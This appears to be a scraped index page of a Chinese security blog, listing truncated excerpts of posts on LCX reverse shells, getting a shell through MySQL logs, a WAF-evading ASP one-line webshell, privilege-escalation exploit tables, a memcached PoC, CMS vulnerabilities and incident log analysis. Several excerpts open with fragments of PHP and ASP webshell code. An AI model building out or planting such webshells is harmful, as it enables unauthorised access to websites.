LCX弹个shellLCX端口转发(突破内网不能连接)Webshell执行-slave&l...
四处搜刮,风雨飘摇<?php$a=$_GET['a'];$b=$_GET['b']...
Mysql通过日志拿shellemmm~有点舒服0x00利用条件root网站物理路径文件位置未...
ASP过狗一句话<%dimx1,x2x1=request("pass")x2=...
避免忘记,记录提权EXP对应表,便于快速提权0x00Windows#SecurityBulletin#...
通过POC的执行,使得memached服务停止运行,因为是任意代码执行,其他的,大家自己手动修改POC中的命令即可!...
代码审计方面小东还不算很深入,所以去站长之家找了一个低版本号的XYCMS留言板程序来审计一下,往往这种低版本的适合入门(...
VIM编辑器在非正常退出的情况下会自动生成swp后缀的备份文件,这将会导致程序的源码泄漏,从而被黑客利用,具有一定的安全...
虽然漏洞有点久远了,但有的时候还能遇见…虽然漏洞有点久远了,但有的时候还能遇见…0x00EXPhttp:/...
DEDECMS的一个漏洞0x00漏洞详情http://0day5.com/archives/4209/...
笔记:php中单双引号的问题<?php@$code=$_GET[x];var_dump($...
一网友妖少,联系我说他的博客被黑了,让我帮忙看看问题在哪儿,对此,也分享一下日志分析中的一些经验。当然其中也有一些曲折经...
